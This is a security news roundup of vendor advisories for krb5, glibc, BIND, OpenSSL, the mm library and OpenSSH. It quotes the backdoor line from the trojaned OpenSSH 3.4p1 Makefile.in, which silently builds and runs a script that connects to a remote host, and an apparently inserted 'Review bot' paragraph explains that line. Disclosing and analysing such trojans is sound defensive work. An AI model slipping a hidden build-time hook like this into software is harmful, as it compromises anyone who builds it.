Security 10929 Published by Philipp Esselbach 0

Red Hat has released an updated krb5 package which fixes a remote buffer overflow:

"The Kerberos 5 network authentication system contains an RPC library which includes an XDR decoder derived from Sun's RPC implementation. The Sun implementation was recently demonstrated to be vulnerable to a heap overflow. It is believed that the attacker needs to be able to authenticate to the kadmin daemon for this attack to be successful. No exploits are known to currently exist."

A glibc update for Debian GNU/Linux has been released:

"An integer overflow bug has been discovered in the RPC library used by GNU libc, which is derived from the SunRPC library. This bug could be exploited to gain unauthorized root access to software linking to this code. The packages below also fix integer overflows in the malloc code. They also contain a fix from Andreas Schwab to reduce linebuflen in parallel to bumping up the buffer pointer in the NSS DNS code.

This problem has been fixed in version 2.1.3-23 for the old stable distribution (potato), in version 2.2.5-11.1 for the current stable distribution (woody) and in version 2.2.5-13 for the unstable distribution (sid).

We recommend that you upgrade your libc6 packages immediately."

Red Hat Inc. has released a security update for the bind packages in Red Hat Linux:

ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and various tools.

A buffer overflow vulnerability exists in multiple implementations of DNS resolver libraries. Applications that utilize vulnerable DNS resolver libraries may be affected. A remote attacker who is able to send malicious DNS responses could potentially exploit this vulnerability to execute arbitrary code or cause a denial of service on a vulnerable system.

It seems that the OpenSSH package on ftp.openbsd.org was trojaned. Thanks Palos.

"The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net)."
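
Review bot: the recipe line added under `all:` executes code at build time, which nothing in building libopenbsd-compat.a requires: it compiles bf-test.c, runs the binary, writes its output to bf-test.out and hands that file to `sh` in the background, and the leading `@` keeps make from echoing the command. The line should be removed, and any Makefile recipe that runs generated output through a shell is worth checking for before running make on a downloaded source tree.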

PkgMaster has released a new OpenSSH package for Cobalt RaQ 3/4 and CacheRaQ4:

- OpenSSH enables you to connect securely (encrypted) to your Sun Cobalt appliance
- Contains both Client and Server software
- Statically compiled against zlib 1.1.4 and openssl 0.9.6e
- PrivSep enabled for better security
- Compression enabled for better performance

A remotely exploitable buffer overflow has been found in OpenSSL.

OpenSSL is a commercial-grade, full-featured, and Open Source toolkit which implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux
SuSE

Marcus Meissner and Sebastian Krahmer discovered a temporary file vulnerability in the mm library which is used by the Apache webserver. This vulnerability can be exploited to obtain root privilege if shell access to the apache user (typically apache or nobody) is already obtained.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux

PkgMaster has released an OpenSSH 3.4p1-4 update for the MIPS based Cobalt RaQ 1/2 server appliances.

This release fixes a major security vulnerability:

"At least one major security vulnerability exists in many deployed OpenSSH versions (2.3.1 to 3.3).

The 3.4 release contains many other fixes done over a week long audit started when this issue came to light. We believe that some of those fixes are likely to be important security fixes. Therefore, we urge an upgrade to 3.4."
